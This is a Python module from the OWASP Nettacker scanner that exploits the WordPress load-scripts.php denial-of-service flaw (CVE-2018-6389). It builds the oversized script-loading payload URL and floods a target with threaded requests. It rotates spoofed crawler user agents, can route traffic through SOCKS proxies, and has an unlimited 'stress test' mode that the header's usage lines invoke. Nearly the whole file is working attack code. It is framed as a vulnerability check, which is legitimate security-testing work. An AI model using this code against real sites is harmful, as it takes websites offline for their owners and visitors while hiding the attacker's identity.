#!/usr/bin/env python # -*- coding: utf-8 -*- # # # Developed using OWASP Nettacker - https://www.owasp.org/index.php/OWASP_Nettacker # Exploit Author: OWASP Nettacker # Description: WordPress Core - 'load-scripts.php' Denial of Service (CVE-2018-6389) # February 5, 2018 # # # # references # https://www.youtube.com/watch?v=nNDsGTalXS0 # https://baraktawily.blogspot.nl/2018/02/how-to-dos-29-of-world-wide-websites.html # https://github.com/viraintel/OWASP-Nettacker/blob/master/lib/vuln/wordpress_dos_cve_2018_6389/engine.py # # # usage: # vulnerability test: python nettacker.py -i http://wpsite/ -m wordpress_dos_cve_2018_6389_vuln # stress test without stopping: python nettacker.py -i http://wpsite/ -m wordpress_dos_cve_2018_6389_vuln --method-args wordpress_dos_cve_2018_6389_vuln_no_limit=True # # # you can also set threads with -t switch or test on list of targets, use --help command to learn more. import socket import socks import time import json import threading import string import random import requests import random import os from core.alert import * from core.targets import target_type from core.targets import target_to_host from core.load_modules import load_file_path from lib.icmp.engine import do_one as do_one_ping from lib.socks_resolver.engine import getaddrinfo from core._time import now from core.log import __log_into_file from core._die import __die_failure def extra_requirements_dict(): return { "wordpress_dos_cve_2018_6389_vuln_random_agent": ["True"], "wordpress_dos_cve_2018_6389_vuln_no_limit": ["False"], } def send_dos(target, user_agent, timeout_sec, log_in_file, language, time_sleep, thread_tmp_filename, retries, socks_proxy, scan_id, scan_cmd): time.sleep(time_sleep) payload = "/wp-admin/load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack" \ ",quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api" \ "-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype" \ ",scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous" \ "-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls," \ "scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core," \ "jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip" \ ",jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold," \ "jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale," \ "jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer," \ "jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker," \ "jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse," \ "jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable," \ "jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs," \ "jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query," \ "jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest," \ "imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers," \ "wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-repl,json2,underscore," \ "backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement," \ "mediaelement-core,mediaelement-migrat,mediaelement-vimeo,wp-mediaelement,wp-codemirror," \ "csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor," \ "wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest," \ "admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent,customize-base,customize-loader," \ "customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh," \ "customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus," \ "wp-custom-header,accordion,shortcode,media-models,wp-embe,media-views,media-editor,media-audiovideo," \ "mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link," \ "comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget," \ "media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post," \ "inline-edit-tax,plugin-install,updates,farbtastic,iris,wp-color-picker,dashboard,list-revision," \ "media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery," \ "svg-painter&ver=4.9.1" try: if socks_proxy is not None: socks_version = socks.SOCKS5 if socks_proxy.startswith('socks5://') else socks.SOCKS4 socks_proxy = socks_proxy.rsplit('://')[1] if '@' in socks_proxy: socks_username = socks_proxy.rsplit(':')[0] socks_password = socks_proxy.rsplit(':')[1].rsplit('@')[0] socks.set_default_proxy(socks_version, str(socks_proxy.rsplit('@')[1].rsplit(':')[0]), int(socks_proxy.rsplit(':')[-1]), username=socks_username, password=socks_password) socket.socket = socks.socksocket socket.getaddrinfo = getaddrinfo else: socks.set_default_proxy(socks_version, str(socks_proxy.rsplit(':')[0]), int(socks_proxy.rsplit(':')[1])) socket.socket = socks.socksocket socket.getaddrinfo = getaddrinfo r = requests.get(target + payload, timeout=timeout_sec, headers=user_agent, verify=True).content return True except: return False def test(target, retries, timeout_sec, user_agent, socks_proxy, verbose_level, trying, total_req, total, num, language, dos_flag, log_in_file, scan_id, scan_cmd, thread_tmp_filename): if verbose_level > 3: info(messages(language, 72).format(trying, total_req, num, total, target_to_host(target), '', 'wordpress_dos_cve_2018_6389_vuln')) if socks_proxy is not None: socks_version = socks.SOCKS5 if socks_proxy.startswith('socks5://') else socks.SOCKS4 socks_proxy = socks_proxy.rsplit('://')[1] if '@' in socks_proxy: socks_username = socks_proxy.rsplit(':')[0] socks_password = socks_proxy.rsplit(':')[1].rsplit('@')[0] socks.set_default_proxy(socks_version, str(socks_proxy.rsplit('@')[1].rsplit(':')[0]), int(socks_proxy.rsplit(':')[-1]), username=socks_username, password=socks_password) socket.socket = socks.socksocket socket.getaddrinfo = getaddrinfo else: socks.set_default_proxy(socks_version, str(socks_proxy.rsplit(':')[0]), int(socks_proxy.rsplit(':')[1])) socket.socket = socks.socksocket socket.getaddrinfo = getaddrinfo n = 0 while 1: try: r = requests.get(target, timeout=timeout_sec, headers=user_agent, verify=True).content return 0 except: n += 1 if n is retries: if dos_flag: __log_into_file(thread_tmp_filename, 'w', '0', language) info(messages(language, 139).format("wordpress_dos_cve_2018_6389_vuln")) data = json.dumps({'HOST': target_to_host(target), 'USERNAME': '', 'PASSWORD': '', 'PORT': '', 'TYPE': 'wordpress_dos_cve_2018_6389_vuln', 'DESCRIPTION': messages(language, 139).format( "wordpress_dos_cve_2018_6389_vuln"), 'TIME': now(), 'CATEGORY': "scan", 'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd}) __log_into_file(log_in_file, 'a', data, language) return 1 def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, ping_flag, methods_args, scan_id, scan_cmd): # Main function if target_type(target) != 'SINGLE_IPv4' or target_type(target) != 'DOMAIN' or target_type( target) != 'HTTP' or target_type(target) != 'SINGLE_IPv6': # rand useragent user_agent_list = [ "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5", "Googlebot/2.1 ( http://www.googlebot.com/bot.html)", "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/10.04" " Chromium/9.0.595.0 Chrome/9.0.595.0 Safari/534.13", "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50727)", "Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51", "Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620", "Debian APT-HTTP/1.3 (0.8.10.3)", "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "Googlebot/2.1 (+http://www.googlebot.com/bot.html)", "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)", "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; " "http://help.yahoo.com/help/us/shop/merchant/)", "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)", "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)", "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" ] user_agent = {'User-agent': random.choice(user_agent_list)} limit = 1000 # requirements check new_extra_requirements = extra_requirements_dict() if methods_args is not None: for extra_requirement in extra_requirements_dict(): if extra_requirement in methods_args: new_extra_requirements[extra_requirement] = methods_args[extra_requirement] extra_requirements = new_extra_requirements random_agent_flag = True if extra_requirements["wordpress_dos_cve_2018_6389_vuln_random_agent"][0] != "True": random_agent_flag = False if extra_requirements["wordpress_dos_cve_2018_6389_vuln_no_limit"][0] != "False": limit = -1 if ping_flag: if socks_proxy is not None: socks_version = socks.SOCKS5 if socks_proxy.startswith('socks5://') else socks.SOCKS4 socks_proxy = socks_proxy.rsplit('://')[1] if '@' in socks_proxy: socks_username = socks_proxy.rsplit(':')[0] socks_password = socks_proxy.rsplit(':')[1].rsplit('@')[0] socks.set_default_proxy(socks_version, str(socks_proxy.rsplit('@')[1].rsplit(':')[0]), int(socks_proxy.rsplit(':')[-1]), username=socks_username, password=socks_password) socket.socket = socks.socksocket socket.getaddrinfo = getaddrinfo else: socks.set_default_proxy(socks_version, str(socks_proxy.rsplit(':')[0]), int(socks_proxy.rsplit(':')[1])) socket.socket = socks.socksocket socket.getaddrinfo = getaddrinfo warn(messages(language, 100).format(target, 'wordpress_dos_cve_2018_6389_vuln')) if do_one_ping(target, timeout_sec, 8) is None: return None threads = [] max = thread_number total_req = limit filepath = os.path.dirname(os.path.dirname(os.path.realpath(__file__))) thread_tmp_filename = '{}/tmp/thread_tmp_'.format(load_file_path()) + ''.join( random.choice(string.ascii_letters + string.digits) for _ in range(20)) __log_into_file(thread_tmp_filename, 'w', '1', language) trying = 0 if target_type(target) == 'SINGLE_IPv4' or target_type(target) == 'DOMAIN': url = 'http://{0}/'.format(target) else: if target.count(':') > 1: __die_failure(messages(language, 105)) http = target.rsplit('://')[0] host = target_to_host(target) path = "/".join(target.replace('http://', '').replace('https://', '').rsplit('/')[1:]) url = http + '://' + host + '/' + path if test(url, retries, timeout_sec, user_agent, socks_proxy, verbose_level, trying, total_req, total, num, language, False, log_in_file, scan_id, scan_cmd, thread_tmp_filename) is not 0: warn(messages(language, 109).format(url)) return n = 0 t = threading.Thread(target=test, args=( url, retries, timeout_sec, user_agent, socks_proxy, verbose_level, trying, total_req, total, num, language, True, log_in_file, scan_id, scan_cmd, thread_tmp_filename)) t.start() while (n != limit): n += 1 if random_agent_flag: user_agent = {'User-agent': random.choice(user_agent_list)} t = threading.Thread(target=send_dos, args=(url, user_agent, timeout_sec, log_in_file, language, time_sleep, thread_tmp_filename, retries, socks_proxy, scan_id, scan_cmd)) threads.append(t) t.start() trying += 1 if verbose_level > 3: info(messages(language, 72).format(trying, total_req, num, total, target_to_host(target), port, 'wordpress_dos_cve_2018_6389_vuln')) try: if int(open(thread_tmp_filename).read().rsplit()[0]) is 0: if limit is not -1: break except: pass while 1: try: if threading.activeCount() >= max: time.sleep(0.01) else: break except KeyboardInterrupt: break break # wait for threads kill_switch = 0 kill_time = int(timeout_sec / 0.1) if int(timeout_sec / 0.1) is not 0 else 1 while 1: time.sleep(0.1) kill_switch += 1 try: if threading.activeCount() is 2 or kill_switch is kill_time: break except KeyboardInterrupt: break thread_write = int(open(thread_tmp_filename).read().rsplit()[0]) if thread_write is 1: info(messages(language, 141).format("wordpress_dos_cve_2018_6389_vuln")) if verbose_level is not 0: data = json.dumps({'HOST': target, 'USERNAME': '', 'PASSWORD': '', 'PORT': '', 'TYPE': 'wordpress_dos_cve_2018_6389_vuln', 'DESCRIPTION': messages(language, 141).format("wordpress_dos_cve_2018_6389_vuln"), 'TIME': now(), 'CATEGORY': "scan", 'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd}) __log_into_file(log_in_file, 'a', data, language) os.remove(thread_tmp_filename) else: warn(messages(language, 69).format('wordpress_dos_cve_2018_6389_vuln', target))